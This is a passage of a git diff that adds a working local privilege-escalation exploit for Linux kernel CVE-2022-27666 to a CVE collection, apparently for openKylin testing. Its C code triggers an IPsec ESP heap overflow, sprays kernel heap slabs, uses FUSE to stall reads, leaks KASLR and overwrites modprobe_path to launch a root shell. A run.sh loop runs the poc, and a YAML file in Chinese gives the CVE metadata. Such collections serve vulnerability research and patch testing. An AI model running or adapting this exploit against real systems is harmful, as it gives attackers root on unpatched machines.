sizeof(my_set), &my_set) != 0) { + perror("[-] sched_setaffinity()"); + exit(EXIT_FAILURE); + } + + nlh = malloc(1024); + memset(&iov, 0, sizeof(iov)); + memset(&msg, 0, sizeof(msg)); + memset(nlh, 0, 1024); + + intptr_t res = 0; + + res = syscall(__NR_socket, AF_NETLINK, SOCK_RAW, NETLINK_XFRM); + + res = syscall(__NR_socket, PF_KEY, SOCK_RAW, PF_KEY_V2); + if (res != -1) + r[0] = res; + + nlh->sadb_msg_version = 0x2; + nlh->sadb_msg_type = SADB_ADD; + nlh->sadb_msg_errno = 0x0; + nlh->sadb_msg_satype = SADB_SATYPE_ESP; + nlh->sadb_msg_len = 0xf; + nlh->sadb_msg_reserved = 0; + nlh->sadb_msg_seq = 0; + nlh->sadb_msg_pid = 0; + + + ehdr = (char *)nlh + sizeof(struct sadb_msg); + ehdr->sadb_ext_len = 0x1; + ehdr->sadb_ext_type = SADB_EXT_KEY_ENCRYPT; + + struct sadb_address *sa_addr = (struct sadb_ext *)((char *)ehdr + ehdr->sadb_ext_len * sizeof(uint64_t)); + sa_addr->sadb_address_len = 0x5; + sa_addr->sadb_address_exttype = SADB_EXT_ADDRESS_DST; + sa_addr->sadb_address_proto = 0x0; + sa_addr->sadb_address_prefixlen = 0x0; + sa_addr->sadb_address_reserved = 0x0; + struct sockaddr_in6 *addr = (char *)sa_addr + sizeof(struct sadb_address); + addr->sin6_family = AF_INET6; + addr->sin6_port = htons(0); + addr->sin6_addr = in6addr_loopback; + + struct sadb_sa *sa = (struct sadb_sa *)((char *)sa_addr + sa_addr->sadb_address_len * sizeof(uint64_t)); + sa->sadb_sa_len = 0x2; + sa->sadb_sa_exttype = SADB_EXT_SA; + sa->sadb_sa_spi = 0x0; + sa->sadb_sa_replay = 0x0; + sa->sadb_sa_state = 0x0; + sa->sadb_sa_auth = 0x0; + sa->sadb_sa_encrypt = 0xb; + sa->sadb_sa_flags = 0x0; + + sa_addr = (struct sadb_address *)((char *)sa + sa->sadb_sa_len * sizeof(uint64_t)); + sa_addr->sadb_address_len = 0x5; + sa_addr->sadb_address_exttype = SADB_EXT_ADDRESS_SRC; + sa_addr->sadb_address_proto = 0x0; + sa_addr->sadb_address_prefixlen = 0x0; + sa_addr->sadb_address_reserved = 0x0; + addr = (char *)sa_addr + sizeof(struct sadb_address); + addr->sin6_family = AF_INET6; + addr->sin6_port = htons(0); + addr->sin6_addr = in6addr_loopback; + + iov.iov_base = nlh; + iov.iov_len = 0x78; + + msg.msg_name = 3; + msg.msg_namelen = 0; + msg.msg_iov = &iov; + msg.msg_iovlen = 1; + msg.msg_control = 7; + msg.msg_controllen = 0; + msg.msg_flags = 0; + + res = syscall(__NR_sendmsg, r[0], &msg, 0ul); + res = syscall(__NR_socket, AF_INET6, SOCK_RAW, IPPROTO_TCP); + if (res != -1) + r[1] = res; + + addr = (struct sockaddr_in6 *)0x200000c0; + addr->sin6_family = AF_INET6; + addr->sin6_port = htons(0); + addr->sin6_addr = in6addr_loopback; + res = syscall(__NR_connect, r[1], (struct sockaddr *)addr, sizeof(*addr)); + + struct xfrm_userpolicy_info *xpinfo = (void*)0x20000100; + xpinfo->sel.daddr.a4 = htobe32(0); + xpinfo->sel.saddr.a4 = htobe32(0xac1e0001); + xpinfo->sel.dport = htobe16(0); + xpinfo->sel.dport_mask = htobe16(0); + xpinfo->sel.sport = htobe16(0); + xpinfo->sel.sport_mask = htobe16(0); + xpinfo->sel.family = AF_INET6; + xpinfo->sel.prefixlen_d = 0; + xpinfo->sel.prefixlen_s = 0; + xpinfo->sel.proto = IPPROTO_IP; + xpinfo->sel.ifindex = 0; + xpinfo->sel.user = -1; + xpinfo->lft.soft_byte_limit = 0; + xpinfo->lft.hard_byte_limit = 0; + xpinfo->lft.soft_packet_limit = 0; + xpinfo->lft.hard_packet_limit = 0; + xpinfo->lft.soft_add_expires_seconds = 0; + xpinfo->lft.hard_add_expires_seconds = 0; + xpinfo->lft.soft_use_expires_seconds = 0; + xpinfo->lft.hard_use_expires_seconds = 0; + xpinfo->curlft.bytes = 0; + xpinfo->curlft.packets = 0; + xpinfo->curlft.add_time = 0; + xpinfo->curlft.use_time = 0; + xpinfo->priority = 0; + xpinfo->index = 0; + xpinfo->dir = XFRM_POLICY_OUT; + xpinfo->action = XFRM_POLICY_ALLOW; + xpinfo->flags = 0; + xpinfo->share = XFRM_SHARE_ANY; + + struct xfrm_user_tmpl *ut = (struct xfrm_user_tmpl *) (xpinfo + 1); + NONFAILING(*(uint8_t*)0x200001a8 = -1); + NONFAILING(*(uint8_t*)0x200001a9 = 1); + NONFAILING(memset((void*)0x200001aa, 0, 13)); + NONFAILING(*(uint8_t*)0x200001b7 = 1); + ut->id.spi = htobe32(0); + ut->id.proto = IPPROTO_ESP; + ut->family = PF_UNSPEC; + ut->saddr.a4 = 0xfc; + ut->reqid = 0; + ut->mode = XFRM_MODE_TRANSPORT; + ut->share = XFRM_SHARE_ANY; + ut->optional = 0; + ut->aalgos = 0; + ut->ealgos = 0; + ut->calgos = 0; + res = syscall(__NR_setsockopt, r[1], SOL_IPV6, IPV6_XFRM_POLICY, xpinfo, sizeof(*xpinfo) + sizeof(*ut)); + + int tty_fd[1024]; + int n_msg; + int msqid_bk[1024]; + + // Consume up kmalloc-4k slab + msg_spray(SLAB_4k_OBJS_PER_SLAB * (1+SLAB_4k_CPU_PARTIAL), MSG_LEN, 1); + msg_spray(SLAB_4k_OBJS_PER_SLAB * (1 + SLAB_4k_CPU_PARTIAL) - 5 , SIZE_OF_USER_KEY_PAYLOAD, 1); + + // consume lower page order's (<=3) freelist + int fill_large = pagealloc_pad(0x1000, 0x1000); + +#ifdef EXPAND_LOWER_ORDER +#define PROC_FORK 10 + // Make sure lower page order (<3) allocatioin and free won't affect + // order 3 (merging from order 2 or split order 3 to fulfill order 2) + initialise_shared(&free_mutex); + pthread_mutex_lock(&free_mutex->mutex); + printf("start filling lower order\n"); + for (int k=0; kdone++; + pthread_mutex_lock(&free_mutex->mutex); + for (int i=0; i<100; i++) { + // free 1 of 2 order 2 blocks, keep the other in order 2 freelist + close(fill_fd[0][i]); + } + free_mutex->done--; + pthread_mutex_unlock(&free_mutex->mutex); + printf("[+] %d free done -> %d\n", k, free_mutex->done); + pause(); + } + } + while (free_mutex->done < PROC_FORK) { + usleep(10000); + } + printf("Released free lock\n"); + pthread_mutex_unlock(&free_mutex->mutex); + while (free_mutex->done > 0) { + usleep(10000); + } + printf("fill lower order done\n"); + close(fill_large); +#endif + + // initialize fuse + init_fuse_mem("evil1/evil", &fuse_mem_addr, NULL, 0x100000); + initialise_shared(&hang_threads); + + pagealloc_pad(0x2000, 0x8000); +#ifdef KERNEL_LEAK + if (!leak_kalsr()) + exit(0); +#endif + +#ifdef KERNEL_EXP + overwrite_modprobe(); +#endif + pause(); +} + +static const struct fuse_operations evil_ops1 = { + .getattr = evil_getattr, + .readdir = evil_readdir, + .read = evil_read_pause, +}; + +static const struct fuse_operations evil_ops2 = { + .getattr = evil_getattr, + .readdir = evil_readdir, + .read = evil_read_sleep, +}; + +void unshare_setup(uid_t uid, gid_t gid) +{ + int temp; + char edit[0x100]; + unshare(CLONE_NEWNS|CLONE_NEWUSER); + temp = open("/proc/self/setgroups", O_WRONLY); + write(temp, "deny", strlen("deny")); + close(temp); + temp = open("/proc/self/uid_map", O_WRONLY); + snprintf(edit, sizeof(edit), "0 %d 1", uid); + write(temp, edit, strlen(edit)); + close(temp); + temp = open("/proc/self/gid_map", O_WRONLY); + snprintf(edit, sizeof(edit), "0 %d 1", gid); + write(temp, edit, strlen(edit)); + close(temp); + return; +} + +char *fargs_evil1[] = {"poc", "evil1", NULL }; +char *fargs_evil2[] = {"poc", "evil2", NULL }; + + +int main(int argc, char *argv[]) +{ + load_symbols(); + initialise_shared(&shell_lock); + pthread_mutex_lock(&shell_lock->mutex); + if (!fork()) + { + pthread_mutex_lock(&shell_lock->mutex); + printf("[+] I AM ROOT!\n"); + execve("/tmp/myshell", NULL, NULL); + } + fargs_evil1[0] = argv[0]; + fargs_evil2[0] = argv[0]; + unshare_setup(getuid(), getgid()); + modprobe_init(); + mkdir(FUSE_MOUNT1, 0777); + mkdir(FUSE_MOUNT2, 0777); + pipe(fuse_pipes); + evil_buffer = malloc(0x10000); + + if (!fork()) + { + fuse_main(sizeof(fargs_evil1)/sizeof(char *) -1 , fargs_evil1, &evil_ops1, NULL); + } + sleep(1); + + if (!fork()) + { + fuse_main(sizeof(fargs_evil2)/sizeof(char *) -1 , fargs_evil2, &evil_ops2, NULL); + } + sleep(1); + + syscall(__NR_mmap, 0x20000000ul, 0x1000000ul, 7ul, 0x32ul, -1, 0ul); + do_sandbox_namespace(); + return 0; +} diff --git a/cve/linux-kernel/2022/CVE-2022-27666/run.sh b/cve/linux-kernel/2022/CVE-2022-27666/run.sh new file mode 100755 index 0000000000000000000000000000000000000000..c30024b141a936a25569310ea7078589ef49d289 --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-27666/run.sh @@ -0,0 +1,9 @@ +#!/bin/bash + +cp get_rooot /tmp/ +cp myshell /tmp/ +while true +do + ./poc + ps aux | grep poc | awk '{ print $2 }' | while read line; do kill -9 $line; done || echo "kill poc, rerun again" +done \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-27666.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-27666.yaml new file mode 100644 index 0000000000000000000000000000000000000000..e9c89f4bcb42a4a4240e6d9a6a6b87285ff43fb8 --- /dev/null +++ b/cve/linux-kernel/2022/yaml/CVE-2022-27666.yaml @@ -0,0 +1,18 @@ +id: CVE-2022-27666 +source: https://github.com/plummm/CVE-2022-27666 +info: + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 + severity: High + description: | + Linux kernel 5.16.15之前版本存在安全漏洞,该漏洞源于net/ipv4/esp4.c 和 net/ipv6/esp6.c 中IPsec ESP 代码存在缓冲区溢出。本地攻击者可利用该漏洞通过覆盖内核堆对象获得特权。 + scope-of-influence: + ~ linux kernel 5.17-rc5 + reference: + - https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.16.15 + - https://www.debian.org/security/2022/dsa-5173 + - https://security.netapp.com/advisory/ntap-20220429-0001/ + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2022-27666 + tags: 缓冲区溢出,权限提升,cve2022 diff --git a/openkylin_list.yaml b/openkylin_list.yaml index df8bb6c267e828d5c80b9b23d3069ec3104a987e..88625aa27226a82b7f7d77b576282b96d815872e 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -20,6 +20,7 @@ cve: - CVE-2022-25636 - CVE-2023-0045 - CVE-2022-32250 + - CVE-2022-27666 sudo: - CVE-2021-3156 - CVE-2023-22809